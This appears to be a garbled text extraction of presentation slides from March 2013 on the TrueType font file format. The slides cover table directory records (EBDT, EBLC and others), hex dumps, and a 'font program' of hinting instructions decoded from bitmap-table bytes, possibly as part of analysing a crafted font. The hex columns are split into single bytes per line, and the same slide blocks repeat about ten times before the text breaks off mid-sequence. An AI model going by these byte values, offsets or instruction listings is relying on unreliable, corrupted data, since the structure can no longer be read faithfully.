45 42 44 54 Tag
(EBDT = “Embedded Bitmap DaTa”)
4b 90 43 d6 CheckSum
(All bytes added together, mod 2 )
00 03 bd 54 Offset
(245076 bytes from beginning of file)
00 00 00 28 Length (Table is 40 bytes long)
Friday, March 8, 2013
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
32
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
A Table Record (16 bytes)
45 42 44 54 Tag
(EBDT = “Embedded Bitmap DaTa”)
4b 90 43 d6 CheckSum
(All bytes added together, mod 2 )
00 03 bd 54 Offset
(245076 bytes from beginning of file)
00 00 00 28 Length (Table is 40 bytes long)
Friday, March 8, 2013
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
32
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
A Table Record (16 bytes)
45 42 44 54 Tag
(EBDT = “Embedded Bitmap DaTa”)
4b 90 43 d6 CheckSum
(All bytes added together, mod 2 )
00 03 bd 54 Offset
(245076 bytes from beginning of file)
00 00 00 28 Length (Table is 40 bytes long)
Friday, March 8, 2013
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
32
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
Another Table Record (16 bytes)
45 42 4c 43 Tag
(EBLC = “Embedded Bitmap Location”)
1f 4d 32 14 CheckSum
(All bytes added together, mod 2 )
00 03 bd 7c Offset
(245116 bytes from beginning of file)
00 00 01 78 Length (Table is 376 bytes long)
Friday, March 8, 2013
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
Font Program Starts here
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
